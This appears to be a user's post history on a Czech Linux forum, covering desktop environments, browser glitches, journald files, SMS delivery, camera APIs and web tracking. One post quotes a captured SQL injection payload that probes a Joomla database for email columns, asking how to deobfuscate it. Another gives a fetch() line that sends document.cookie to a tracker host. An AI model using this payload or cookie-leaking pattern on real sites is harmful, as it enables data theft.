Příspěvky

76

Desktop / Výběr vyzrálého desktopového prostředí

« kdy: 24. 10. 2022, 00:47:37 »

Které  desktopové linuxové prostředí doporučíte? Mělo by být vyzrálé, aby tam nechyběly programy pro základní činnosti, aby programy se držely podobných UI konceptů aby to nebyl každý program jiná ves. Pokud možno víc funkcí než ne/ořezeaná tupé XFCE (ta jednduchost má něco o sebe, ale už mě nebaví, kromě toho z toho číší spíš nedodělanost, jako kdyby UI designér odešel v půlce práce).

Mám takový skromný dotaz, jak sakra vložím obrázek ze schránky ? Obrázek mám ve schránce a chci ho do souboru. prostředí mate je panoptikum  náhodných programů s názvy jako čaja, šotvel, celulitioid ,EyeOF MATE.. Jako kdyby jedny programy navrhoval asiat, jinou skupinu rus (sony alpha a7 první řady).  Ale nikde jsem v nenašel program, který umí vložit obrázek ze schránky. zkoušel jsem shotwell, nástroj pro screenshoty.

77

Desktop / Grafické artefakty v prohlížeči Chrome

« kdy: 24. 10. 2022, 00:36:34 »

Objevujou se mi na kompu grafický glyče, čím by to mohlo být? dmesg nic nehlásí. browser je chrome, a dělají o jen některé stránky.

Vždy de o pruh přes celou šířku, ale o pevné výšce, celé to scrolluje. Občas se to odhalí na správný obsah co má být když zkusím přejet myší, označí text atd, ale asi na padesátý pokus.

Prosakují tam i  prvky jiných webových tabú. Občaas pomůže resize okna.

Zrovna to problémový místo se drží místo jak ho*n* košile prostě jako kdyby se to drželo konkrétních html elementů.

Jinde v os - žádný problém.Většina tabů - žádný problém. Může jít ale o seskupení tabů to jednoho procesu. Zkoušel jsem kilnout grafickýho posluhovače chromu.

78

Software / SQL deobfuscátor

« kdy: 23. 10. 2022, 23:44:31 »

Existuj SQL deobfuscátor?

Kód: [Vybrat]

13+  AND (SELECT 5808 FROM(SELECT COUNT(*),CONCAT(0x54736d46,(SELECT MID(IFNULL(CAST(COLUMN_NAME AS NCHAR),0x20),1,55) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=0x7679706164656b AND TABLE_NAME=0x6a6f735f62616e6e6572636c69656e74 AND COLUMN_NAME LIKE (0x25656d61696c25) AND COLUMN_NAME NOT LIKE (0x256c61737425) AND COLUMN_NAME NOT LIKE (0x256461746525) AND COLUMN_NAME NOT LIKE (0x2574696d6525) AND COLUMN_NAME NOT LIKE (0x2573746174757325) AND COLUMN_NAME NOT LIKE (0x25737562736372697074696f6e25) LIMIT 1),0x4e49746c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Aspoň 0x jsem přes perl nahradil...

Kód: [Vybrat]

["TsmF", " ", "vypadek", "jos_bannerclient", "%email%", "%last%", "%date%", "%time%", "%status%", "%subscription%", "NItl"]

79

Software / Organizace souborů ve /var/log/journal

« kdy: 21. 10. 2022, 15:48:22 »

Mám komplexnější dotaz ohledně dřívějších záznamů(z předešlých bootuů) na záznamy dmesg a journactl.
1. Jak dlouho se uchovávají v /var/log/journal?
2. jaký je význam  bezprostředního adresáře journal/RANDOM_HEX (je tam jen jeden).
Dál už uvažuji jen v tomto adresáři. Je  tam dost souborů  8MBa 16MB.
Začínají system@ a user-1000@ ,, z toho jsem pochopil, že první je ekvival. dmesg nebo journalctl -k.
Ale část za @ se liší:
0005ea7587e9a2a4-1944b2e2936e8ca4.journal~
0037673c0a164c35b1e16ea38b972896-00000000000015ab-0005b8c92f88f975.journal
user-1000.journal (bez @) a system.journal
Nejsou tam žádné symlinky.

Co znamená poslední znak ~ ?
Jaká je jejich časová soushlednost (bohužel systému nejdou hodinyRTC, takže data neodpovídají). Ale třeba hodinu po bootu se ručně nastaví čas na správný.

Existuje nějaká možnost jak vypsat detaily každého souboru, odkdy dokdy tam jsou záznamy?
Je možnost hledat v všech souborech naráz v určitém rozpětí dat


jaký je význam  v *.journal bez ~  koncové části 3dfa972ac65e4018acd9d6882978be07-000000000000046f-0005dd290e402ffa,
ea22e21698d54068b5e06cfee961cfcc-0000000000001002-0005df9cda5849b7 ?
Vypadá to jako když 1.část je random, druhá nějaká nízká série a třetí  (skoro !)odpovídá
souborů s tildou ~ user-1000@0005dd290e312b68-ac708be4d17ce1bc.journal~

80

Distribuce / V Debianu nefunguje taskset time příkaz

« kdy: 20. 10. 2022, 19:41:23 »

Z jakého důvodu v debianu nejde příkaz

Kód: [Vybrat]

taskset -c 0 time grep -r bla..._.+ dir

Hlásí to taskset: failed to execute time :Adresář/složka neexistuje

Na Ubuntu to jde.

Do toho mám druhý dotaz, proč vrací forma tasket time příkaz patičku kde chybí nové řádky a tabulátory? Narážím na tu ztrátu formátování mezer, řádků oproti běžnému příkazu time whoami, který je na 3 řádku úhledně a tabulátory zajíštují i sloupcový vzhled..

Kód: [Vybrat]

Výstup        z 
  programu ještě s zachovanými
   mezery       a tabulátory.
KONEC PROGRAMU10.21user 0.00system 0:4.21elapsed 99%CPU

Mimochodem: přehození time na začátek taky jde na obou platformách. Ale setkal jsem se další zvláštností, že nějak výsledky real/user/sys byly nekonzistentní v tom smyslu, že občas byl user čas skoro nulový, když normálně se téměř rovná času real. Bohužel nemohu zreprodukovat.

To by se vysvětlilo čím? Tipoval bych něco směrem, že úloha se přesunula na jiný cpu...což je věc náhody a možná aktuálního zátěže systému.

81

Odkladiště / Existuje typ SMS, který přijde jen když je telefon v tu dobu zapnutý?

« kdy: 04. 10. 2022, 22:13:35 »

Když mám vypnutý mobil, tak jednorázové SMS mi nepřijdou ani později (ani ty co by se vešly do časového limitu x minut pro zadání do bankovnictví v době zaputí telefonu). Čím to je? Je to na straně telefonu, operátora nebo autora SMS? Je to nějaký flag, který určuje, že SMS


A jak technicky příjem SMS probíhá? Něco na způsob TCP, že telefon povrdí příjem?. Posílá rovnou BTS text zprávy nebo nejdřív navazuje spojení?

82

/dev/null / Re:XML <camrply> Framework na ovládání kamer a foťáků "cam.cgi?mode=*&value="

« kdy: 20. 09. 2022, 19:30:39 »

Jak mám vědět, že jde o zdroj? Kdyby to bylo u jedné značky, tak neřeknu, ale podle mě to vypadá na nějaký širší standard? Každopádně děkuji za link, přeskočil jsem na https://gopro.github.io/OpenGoPro————>/http_2_0 . Sice jde o jinou doménu, než jsem psal v dotazu, takže něco nového, ale taky tam píšou o podporovaných modelech 8/9/10, a 6 existovala mnohem dřív, takže to těžko bude zdroj, když stránky, které jsem uvedl já mají i zmíněnoou GOPRO 5 a GOPRO 4 dokonce.

  A proč je to hned v /Dev/null  ? ANiž by se rozběhla technikcá debata ? 

83

Sítě / Re:OpenVPN keepalive

« kdy: 20. 09. 2022, 15:27:44 »

Keepalive obecně bez kontextu je cokoli. Například http keepalive u Connection- keep-alive.
Ale asi myslíš, to, že klient je za natem a musí posílat každou chvílí keepalive pakety, aby NAT mimo kontrolu užuivatele nerozvázal spojení(mapping)

To zjistíš experimentálně, kdy se bude ze serveru připojovat na klienta v prodlužujících intervalech.

U mě 2 MINUTY.

84

Odkladiště / Re:Jednoduche double-entry sledovanie transakcii v marketplace

« kdy: 20. 09. 2022, 15:24:01 »

Taková maličkost, co jsou ty dvojitý entry?

85

/dev/null / XML <camrply> Framework na ovládání kamer a foťáků "cam.cgi?mode=*&value="

« kdy: 20. 09. 2022, 15:21:06 »

Něco podobného jsem viděl u víc kamer různých značek, neexistuje nějaká specifikace, nebo software (klikací) k ovládání kamer co umí takovýhle protokol ??

Našel jsem 2 podobné
https://github.com/cleverfox/lumixproto (PANASONIC GX80)
A GOPRO hero
https://github.com/KonradIT/goprowifihack/blob/master/HERO6/HERO6-Commands.md

Je to XML , tagy camrply , url cam.cgi a jednoduché parametry mode a value
 (jasně v tom druhém json a cool URL)

http://192.168.1.60/cam.cgi?mode=getstate

Kód: [Vybrat]

<camrply>
<result>ok</result>
<state>
<batt>2/3</batt>
<cammode>rec</cammode>
<remaincapacity>16816</remaincapacity>
...
</state>
</camrply>

Nebo
cam.cgi?mode=getinfo&type=capability

Kód: [Vybrat]

 
camrply>
<result>ok</result>
<comm_proto_ver>1.4</comm_proto_ver>
<productinfo>
...
</productinfo>
<camcmdlist>
<camcmd>tele-normal</camcmd>

<camcmd>wide-fast</camcmd>
</camcmdlist>
<camspeclist>
...
</camspeclist>
<asst_disp>
<disp_mag min="300" max="1000"/>
<pinp_mag min="300" max="600"/>
</asst_disp>
...
</videoquality>
<videoquality name="4K/24p" value="mp4_24p_100mbps_4k">
...
</videoquality>
<videoquality name="FHD/60p" value="mp4_60p_28mbps">
<framerate name="60fps" value="60"/>


...
</videoquality>
</stopmotionlist>
</stopmotiontset>
<contents_action_info >
...
</contents_action_info>
</camrply>

Ovládání:

http://10.5.5.9/gp/gpControl/command/shutter?p=1
/cam.cgi?mode=camcmd&value=video_recstart

86

/dev/null / Re:dekodování zvláštní sekvence z seznam.cz

« kdy: 28. 08. 2022, 11:50:09 »

tak jsem to našel na novinky.cz
https://a.iva.seznam.cz/q.js (28000 znaků)

Kód: [Vybrat]

733b373bj7126w3owvb373b40642e2....

87

/dev/null / Iva z seznam.cz

« kdy: 20. 08. 2022, 13:00:47 »

Můj logger zachytil u někoho doménu  a.iva.seznam.cz. tipl bych že je to max 3.měs. staré. Nevíte o co jde? Vyhledávače nic mi nenašly

88

Odkladiště / Re:Web tracking od Google, Facebooku apod.

« kdy: 27. 07. 2022, 17:02:34 »

Těch způsobů je hodně. V zásadě, když si lehkovážný webmaster k sobě je schopen na web připustit cizí javascript (což splňuje like tlačítko, captha a tohle) z cizí domény, nemůže se divit, co se děje dál.
Způsobů je hodně a záleží taky jestli do toho vtahujete nastavení prohlížečů, blokátory . Ale tohle se asi v tématu neřeší, jak se k tomu postavý "konzument"(browser, uživatel).
Víceméně dřív se používalo takové img src=toplist.cz/124343434.gif?0.0231231 , teď je to i stavové. Průser je to sdílení dat mezi taby alias cookies třetích stran a nebo může být i skript, který přes document.cookie nebo řetěz redirectů Location může identifikátory "nasdílet" , že kaskáda Location rozeseje cookie na víc doménách a nebo stránka provede víc requestů typu fetch(tracker.com/?id= + document.cookie.mujcookienázev)

Jsou takové 3 pilíře: uložený identifikátor (nastavený cookie), vypočtený identifikátor (hash fingerprintu), vlastní identifikátor (tím že máš nějaký účet a jsi přihlášen) a potom nutný identifikátor( ip adresa), za další se dá považovat čas

89

Odkladiště / Re:Nefunční zabezpeční Alza.cz

« kdy: 27. 07. 2022, 16:52:47 »

Facebook nebo google bežně ukazují IP posledních přihlášení, aktivních relací a nepovedených přihlášení na vlastním účtu, ...

Ta to asi používáte nějaký jiný Facebook a Google než já. Protože mě to ukazuje pouze info typu "Android on Blackberry v Praze", ale IP rozhodně ne.

Fakt to funguje, i když nějak polorozbitě,jako vše kolem UI na facebooku. Stačí na příšlušný řádek kliknout prstem (nebo najet myší???) a ukáže se šedá komiksová bublina s IP. Polorozbitě kvůli tomu, že asi po 4 kliknutí (když si jich chci prohlídnou víc  nebo jejich permutaci), tak to po chvíli přestane fungovat. ALe stačí reload stránky. Takže ne běžně, ale po najetí
 
Ale zajímalo by mě, kde ukazuje login attempts, to jsem neviděl nikde.

Jinak alza měla nějaký velký bezpečnostní problém s nějakýmí notifikacemi na e-mail, že tam byly linky přes plain HTTP.  A nevím co už byla pointa, jestli jen že útočník viděl obsah komunikace (myslím, že mohl vidět pin pro vyzvednutí a dojít si tam dřív) a nebo druhá věc že ten link obsahoval v sobě něco jako token pro přihlášení (přece když vám na mail přijde nějaké potvrzení  s odkazem do klientské sekce tak proč se obtěžovat s přihlašováním, když to přece přišlo do mailu)... Ale nevím, už je to minimálně rok.

Wikipedia si s veřejnění poradila trochu jinak a jsou na hraně, ví ale co dělají

Jak jinak? Všem se liší 255.1.2.3 od 255.1.2.3 ? a co "ví"?že dělají dobře, na základě čeho

Pro Alzu je IP adresa osobní údaj. To chápete?

Ale ta IP adresa ani nemusí být být jejích klient/zákazník. V tom případě stačí říct najděte který z vašich zákazníků to udělal, pokud ho dohledáte podle IP anebo mi tu ip pošlete a nemusíte být předposraný, že sdělujete osobní údaj
A není náhodou vyjímka pro kriminálníky, že se na ně práva nevztahují? To pak je blbý, když ten zloděj (který ani není zákazník) nedá souhlas. To je ale gauner, nedal souhlas,.
Je to trochu těžší, že pod jednou adresou mohou být i normální zákazníci (nesouvisí to s NATem ) a může se se to měnit v čase.
Souhlasím, že není nutné /32.

Navíc pořád tvrdíte, že by vám měla Alza ukázat cizí IP adresu z logu, a teď najednou vlastní IP adresu rozmazáváte? Proč? Zase pro vás platí jiná pravidla?

Tak tohle už je Jirsákovův argumentační způsob "tah koněm", když se má hrát rovně nebo zašmodrchání kolejnice

90

Odkladiště / Co je to za aktéra

« kdy: 16. 07. 2022, 22:18:57 »

Co je zač tento xmhttprequest?

https://m.facebook.com/actor_validate/voice_validate/?screen_uri=https%3A%2F%2Fm.facebook.com%2Fhome.php%3Ftbua%3D1

Dřív(mesíc a víc ) jsem ho nepozoroval. Bohužel nemám vývojářské nástrojeprohlížeče  na mobilu  a tak se ptám takhle partyzánsky.. Navíc debuggovat facebook.com/rsrc.php je něco jako luštit čínskí písmo poházené po vichřici


A mimojiné, nevíte, proč došlo ke změně URL Neděje se to v GROUP, ale na postech lidí):
https://m.facebook.com/notifications#!/story.php?story_fbid=pfbid02NějakáLikebase64&id=CISLO_ZACINAJICI

z původního
https://www.facebook.com/NAZEV_PAGE/posts/CISLO_POSTU_ZACINAJICI1000


Nemyslím vůbec ten #! HASBANG i když ten mě taky SE*E.. Jde mi o to, že v současn formě _pfbidblabla nedostanu to CISLO_POSTU a podle mě může obsahovat cosi

A to teď uplně schovávám rant na "hlučnost" odkazů z(/na) facebooku, hlavně sledovací linky l.facebook při odkazu v postu na jiný server, na odkazy na posty na timeline (spousta sledovacích parametrů) a ani nezminuji lamy ,které do mailů nebo mimo walled.raden.facebook pouzívají linky ukončené ?gfbclid=